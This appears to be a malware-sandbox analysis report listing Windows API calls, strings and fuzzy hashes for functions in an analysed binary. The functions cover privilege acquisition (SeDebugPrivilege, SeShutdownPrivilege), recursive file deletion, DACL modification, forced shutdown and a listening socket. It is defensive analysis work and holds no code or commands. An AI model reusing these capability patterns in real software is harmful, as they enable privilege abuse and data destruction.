                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 999945258-2428617273
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00443D19: _wcslen.LIBCMT ref: 00443D34
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00464F2A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00464F40
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 00464F54
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 00464F5B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 00464F6C
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00464F73
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: OpenProcess$CurrentThreadToken$ErrorLast_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeDebugPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1312810259-2896544425
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00403492
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004034A7
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004034BC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 004035A0
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00403623
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0040367D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                                                                                                                                                                                                                                                                                • _, xrefs: 0040371C
                                                                                                                                                                                                                                                                                                                                                                                                                                • Error opening the file, xrefs: 00428231
                                                                                                                                                                                                                                                                                                                                                                                                                                • Unterminated string, xrefs: 00428348
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$ByteCharCurrentDirectoryMultiWide_wcscpystd::exception::exception$Exception@8FullNamePathThrow__wsplitpath__wsplitpath_helper_malloc_memmove_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3393021363-188983378
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce77724faf1e7fbc9fcf9b1a922f2907e035de924d79ec5656a8af7ae9668c55
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 00431AAA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 00431AE7
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 00431AFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00431B0F
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B20
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431B34
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 00431B4F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00431B96
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 00431BBA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 00431BC2
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BCD
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00431BDB
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00431C09
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00431C2E
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00431C3A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 00431C67
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectoryFullNamePath__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2192556992-3457252023
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 004722A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 004722B9
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,0048BF68), ref: 004724EC
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002B,00000000,00000000,0048BF68), ref: 00472506
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,0048BF68), ref: 00472520
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,0048BF68), ref: 0047253A
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000019,00000000,00000000,0048BF68), ref: 00472554
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000002E,00000000,00000000,0048BF68), ref: 0047256E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,0000001F,00000000,00000000,0048BF68), ref: 00472588
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000017,00000000,00000000,0048BF68), ref: 004725A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHGetFolderPathW.SHELL32(00000000,00000016,00000000,00000000,0048BF68), ref: 004725BC
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FolderPath$LocalTime__swprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %.3d
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3337348382-986655627
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004428A8
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 0044290B
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044291C
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 00442930
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 0044294D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0044299C
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetCurrentDirectoryW.KERNEL32(0048AB30), ref: 004429BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004429C9
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429D4
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433C08: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00433C2A
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 004429E2
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BFC5
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0044BFEF
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 0044C004
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 0044C030
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044C042
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044C054
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteFileW.KERNEL32(?), ref: 0044C061
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 0044C075
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044C084
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 0044C093
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: FileFind$_wcscat$Close$AttributesDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3771809977-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                                                                                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                                                                                                                                                                                                                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                                                                                                                                                                                                                                                                                • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                                                                                                                                                                                                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                                                                                                                                                                                                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433073
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00433085
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433092
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                                                                                                                                                                                                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                                                                                                                                                                                                                                                                                                • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Resource$FindLoadLock__swprintf$Sizeof__wcsicoll
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1158019794-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4194297153-14809454
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                                                                                                                                                                                                                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                                                                                                                                                                                                                                                                                • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 540024437-0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
